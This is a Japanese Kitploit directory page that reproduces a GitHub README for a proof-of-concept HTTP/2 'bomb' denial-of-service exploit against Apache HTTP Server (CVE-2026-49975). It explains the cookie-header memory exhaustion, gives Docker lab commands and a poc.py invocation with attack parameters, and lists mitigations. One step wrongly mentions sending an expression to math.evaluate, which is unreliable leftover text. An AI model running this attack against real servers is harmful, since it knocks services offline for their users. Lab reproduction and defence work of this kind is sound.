Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/yym8538/cve-2026-49975
脆弱性分析エクスプロイトウェブセキュリティネットワークセキュリティレッドチーミング
GitHubyym8538/cve-2026-49975

CVE-2026-49975

CVE-2026-49975(Apache HTTP Server 2.4.17-2.4.67におけるCookieヘッダーによるメモリ枯渇DoS)の概念実証HTTP/2 Bombエクスプロイト。DockerラボとPoCスクリプト付き。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-49975 HTTP/2 Bomb

★ CVE-2026-49975 HTTP/2 Bomb PoC ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


概要

CVE-2026-49975 は Apache HTTP Server における サービス拒否(DoS) 脆弱性です。 この脆弱性は HTTP/2 リクエスト処理パスで発生し、複数の cookie ヘッダーフィールドが LimitRequestFields に対して適切にカウントされることなくマージされる可能性があります。 小さな HPACK エンコードされた HTTP/2 リクエストを送信して多数の cookie ヘッダーフィールドに展開させることで、攻撃者は Cookie ヘッダーのマージ中にサーバーに繰り返しメモリを割り当てさせることができます。 その後、攻撃者は HTTP/2 フロー制御を利用してレスポンス送信を遅延させ、影響を受けるストリームを開いたままにして、割り当てられたメモリが解放されないようにすることができます。


影響を受けるバージョン

カテゴリバージョン
脆弱Apache HTTP Server 2.4.17 ≤ version ≤ 2.4.67
修正済みApache HTTP Server 2.4.68 以降

影響

  • リモートサービス拒否(DoS)
  • 過剰なメモリ消費
  • 通常のユーザーリクエストの処理遅延または失敗

環境

脆弱な Apache HTTP Server 環境をビルドして実行します。

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

脆弱な環境を起動した後、以下の手順に従って攻撃を再現します。

ステップ 1. サーバーのメモリ使用量を監視する

root@kitploit:~
docker stats cve-2026-49975

出力例:

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

ステップ 2. HTTP/2 Bomb PoC を実行する

以下の式を math.evaluate に送信します(例: アプリケーションの計算入力欄を通じて)。

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

ステップ 3. 結果を確認する

攻撃ストリームが開かれたままの間、Apache コンテナのメモリ使用量が増加し、高い状態が維持されることを確認します。

緩和策

  • Apache HTTP Server を 2.4.68 以降にアップグレードする
  • サービスが HTTP/2 を必要としない場合は、一時的に無効化することを検討する

分析

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • EN:
ツールをダウンロード